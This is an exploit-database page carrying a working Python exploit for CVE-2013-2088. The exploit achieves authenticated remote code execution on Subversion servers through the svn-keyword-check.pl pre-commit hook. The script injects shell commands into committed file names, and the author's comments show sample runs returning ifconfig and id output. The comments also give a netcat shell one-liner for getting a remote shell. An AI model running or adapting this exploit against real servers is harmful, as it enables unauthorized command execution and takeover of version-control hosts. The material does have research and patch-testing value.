0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Subversion 1.6.6 / 1.6.12 - Code Execution
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
# This is an exploit for the subversion vulnerability published as CVE-2013-2088.
# Author: GlacierZ0ne (kai@ktechnologies.de)
# Exploit Type: Code Execution
# Access Type: Authenticated Remote Exploit
# Prerequisites: svn command line client available,
# subversion server exposes webdav through apache,
# user/password with commit privilege
# The exploit has been tested with the following software:
# * subversion 1.6.6 server on Ubuntu 10.06 server 64-bit
# * subversion 1.6.12 (r955767) on Ubuntu 11.10 server 32-bit
# * subversion client version 1.8.8 (r1568071) on Ubuntu 14.04 64-bit
# The following conditions need to be met in order for this to work:
# The pre-commit script svn-keyword-check.pl needs to be configured as
# pre-commit hook. The version shipped with the subversion 1.6.6 contains
# a bug which prevents it from being used at all. This bug must be fixed
# (otherwise neither the exploit, nor the intented purpose of the script
# will work)
# This perl script can be downloaded from the archive source distribution
# at http://archive.apache.org/dist/subversion/. Scripts before 1.6.23
# are vulnerable.
# ###############################################################
# 1. configure the pre-commit hook to use svn-keyword-check.pl
# ###############################################################
# Copy the svn-keyword-check.pl from the source distribution to the
# /svn/repos/<your repository>/hooks directory. Rename pre-commit.tmpl
# to pre-commit. Make sure both files are owned by the user running
# apache (e.g. www-data) and have the executable flag set:
#
# notroot@ubuntu:/$ cd /svn/repositories/testrepo/hooks
# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo mv pre-commit.tmpl pre-commit
# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo chmod +x pre-commit
# notroot@ubuntu:/svn/repos/testrepo/hooks$ ls -al
# total 76
# drwxr-xr-x 2 www-data www-data 4096 2016-09-30 13:35 .
# drwxr-xr-x 7 www-data www-data 4096 2016-09-05 16:28 ..
# -rw-r--r-- 1 www-data www-data 2000 2016-09-05 15:23 post-commit.tmpl
# -rw-r--r-- 1 www-data www-data 1663 2016-09-05 15:23 post-lock.tmpl
# -rw-r--r-- 1 www-data www-data 2322 2016-09-05 15:23 post-revprop-change.tmpl
# -rw-r--r-- 1 www-data www-data 1592 2016-09-05 15:23 post-unlock.tmpl
# -rwxr-xr-x 1 www-data www-data 604 2016-09-30 13:32 pre-commit
# -rw-r--r-- 1 www-data www-data 609 2016-09-05 19:10 pre-commit.tmpl
# -rw-r--r-- 1 www-data www-data 2410 2016-09-05 15:23 pre-lock.tmpl
# -rw-r--r-- 1 www-data www-data 2796 2016-09-05 15:23 pre-revprop-change.tmpl
# -rw-r--r-- 1 www-data www-data 2100 2016-09-05 15:23 pre-unlock.tmpl
# -rw-r--r-- 1 www-data www-data 2830 2016-09-05 15:23 start-commit.tmpl
# -rwxr-xr-x 1 www-data www-data 8340 2016-09-30 13:35 svn-keyword-check.pl
# notroot@ubuntu:/svn/repos/testrepo/hooks$
# According to the subversion documentation, svn-keyword-check.pl needs
# to be called by pre-commit. svn-keyword-check.pl will return 1 if it
# detects something that should prevent the commit. In that case, the
# subversion server will cancel the commit. Here's how pre-commit looked
# on my test server:
# notroot@ubuntu:/svn/repos/testrepo/hooks$ cat pre-commit
# #!/bin/sh
# REPOS="$1"
# TXN="$2"
# # Make sure that the log message contains some text.
# #jSVNLOOK=/usr/bin/svnlook
# $SVNLOOK log -t "$TXN" "$REPOS" | \
# ep "[a-zA-Z0-9]" > /dev/null || exit 1
#
# # Exit on all errors.
# set -e
#
# # Check the files that are are listed in "svnlook changed" (except deleted
# # files) for possible problems with svn:keywords set on binary files.
# "$REPOS"/hooks/svn-keyword-check.pl --repos $REPOS --transaction $TXN
# #
# #
# #
#
# # All checks passed, so allow the commit.
# exit 0
#
# ###############################################################
#
# 2. fix the bug in svn-keyword-check.pl
#
# ###############################################################
# The script pre-commit will pass on repository and transaction to
# the script svn-keyword-check.pl. Alternatively, it also accepts
# repository and revision. However, specifying both transaction
# and revision is illegal, only one of them is considered legal.
# This reflects in the input parameter plausibility check
# performed in line 89:
#
# if (defined($transaction) and !defined($revision)) {
# croak "Can't define both revision and transaction!\n";
# }
#
# Unfortunately, there is an exclamation mark too much. It must
# be
#
# if (defined($transaction) and defined($revision)) {
# croak "Can't define both revision and transaction!\n";
# }
#
# The way this script is shipped in the 1.6.6 source distribution
# no commit is possible at all.
#
# Before using the exploit you should first commit one file
# manually so that the svn client can store your user/password
# locally.
#
# Then, open a shell and navigate to the directory of your project
# and start python cve-2013-2088-1.py <command>:
#
# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py ifconfig
# [+] Randfilename is mJHeSkya
# [+] Created random file
# [+] Submitted random file to version control
# [+] Created fake file for cmd execution
# [+] Exploit seems to work:
#
# eth0 Link encap:Ethernet HWaddr 00:0c:29:08:a3:1a
# inet addr:192.168.26.136 Bcast:192.168.26.255 Mask:255.255.255.0
# inet6 addr: fe80::20c:29ff:fe08:a31a/64 Scope:Link
# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
# RX packets:1060 errors:0 dropped:0 overruns:0 frame:0
# TX packets:806 errors:0 dropped:0 overruns:0 carrier:0
# collisions:0 txqueuelen:1000
# RX bytes:172042 (172.0 KB) TX bytes:136684 (136.6 KB)
#
# lo Link encap:Local Loopback
# inet addr:127.0.0.1 Mask:255.0.0.0
# inet6 addr: ::1/128 Scope:Host
# UP LOOPBACK RUNNING MTU:16436 Metric:1
# RX packets:0 errors:0 dropped:0 overruns:0 frame:0
# TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
# collisions:0 txqueuelen:0
# RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
#
# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py id
# [+] Randfilename is WmolHiuv
# [+] Created random file
# [+] Submitted random file to version control
# [+] Created fake file for cmd execution
# [+] Exploit seems to work:
#
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
#
# Important things to notice
# * For each command execution the exploit will put a file under
# version control. If you submit a lot of commands you will
# create a lot of files with random 8 alphanumeric character
# file names in your repository.
# * Your command must not contain a / since file names must not
# contain a /. In the author's test environment the current
# working directory of apache was the root folder /.
# Therefore, the exploit will replace / in the command with
# $(pwd). This worked fine for the author.
# In your environment this might be different. As first thing
# execute $(pwd) in order to check if this works for you, too.
# * The command execution assumes that your command prints something
# to the terminal and exits. If you know your command will not
# immediately terminate (e.g. because you're starting a reverse/
# bind shell), provide the -d or --dont-terminate flag:
# python svn_exploit2.py -d "/bin/bash 0</tmp/mypipe | nc -l 192.168.1.100 4444 1> /tmp/mypipe"
#
#
#
import sys
import subprocess
import argparse
import random
import os
if __name__ == "__main__":
lowerupper = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
slash_replacement = "$(pwd)"
cwd = os.getcwd()
parser = argparse.ArgumentParser (usage="python {} [options] command".format (sys.argv [0]),
epilog="\x0a\x0a")
parser.add_argument (dest="command", help="Command to execute")
parser.add_argument ("-d", "--dont-terminate", help="don't force output be sent back to the client. Useful for reverse shell connections.",
action="store_true")
#
# args handling
#
if (len(sys.argv) <= 1):
parser.print_help ()
sys.exit (0)
args = parser.parse_args ()
if not args.command:
parser.print_help ()
sys.exit (0)
#
# / cannot be used in the command because svn will interprete it as
# file separator. Therefore you have to use a workaround. Here,
# $(pwd) works great for us.
#
command = args.command
if command.find ("/") != -1:
command = command.replace("/", slash_replacement)
#
# prepare output files for stdout, stderr
#
sout = open ("stdout", "w+")
serr = open ("stderr", "w+")
randfilename = ""
for idx in range (0, 8):
randfilename = randfilename + lowerupper [random.randint (0,51)]
print ("[+] Randfilename is {}".format(randfilename))
f = open (randfilename, "w+")
f.write ("You've been pwned by GlacierZ0ne'") # write 4
f.flush ()
f.close ()
p = subprocess.Popen (["svn", "add", "./{randfilename}".format (randfilename=randfilename)],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
c = p.communicate ()
sout.write (c[0])
if len(c[1]) > 0:
print ("[-] Create random file failed:")
print (c[1])
sys.exit (0)
print ("[+] Created random file")
p = subprocess.Popen (["svn", "commit", "-m", "I pwned you", "./{randfilename}".format (randfilename=randfilename)],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
c = p.communicate ()
sout.write (c[0])
if len(c[1]) > 0:
print ("[-] Submission of random file failed:")
print (c[1])
sys.exit (0)
print ("[+] Submitted random file to version control")
fakefilename = None
if args.dont_terminate == True:
fakefilename = "{}; {}".format (randfilename, command)
else:
fakefilename = "{}; {} 1>&2; exit 1".format (randfilename, command)
f = open (fakefilename, "w+")
f.write ("You've been pwned by GlacierZ0ne") # write 4
f.flush ()
f.close ()
p = subprocess.Popen (["svn", "add", "{fakefilename}"
.format (cwd=cwd, fakefilename=fakefilename)],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
c = p.communicate ()
sout.write (c[0])
if len(c[1]) > 0:
print ("[-] Creation of fake file failed:")
print (c[1])
sys.exit (0)
print ("[+] Created fake file for cmd execution")
p = subprocess.Popen (["svn", "commit", "-m", "I pwned you", "{fakefilename}"
.format (cwd=cwd, fakefilename=fakefilename)],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
c = p.communicate ()
sout.write (c[0])
if len(c[1]) == 0:
if not args.dont_terminate:
print "[-] Something went wrong, pre-commit hook didn't kick in."
else:
print "[!] Done"
sys.exit (0)
else:
idx0= c[1].find ("Commit blocked by pre-commit hook")
idx = c[1].find ("failed with this output")
if idx0 != -1 and idx != -1:
print ("[+] Exploit seems to work: ")
print (c[1][idx + len("failed with this output") + 1:])
sout.flush ()
sout.close ()
serr.flush ()
serr.close ()
# 0day.today [2024-11-15] #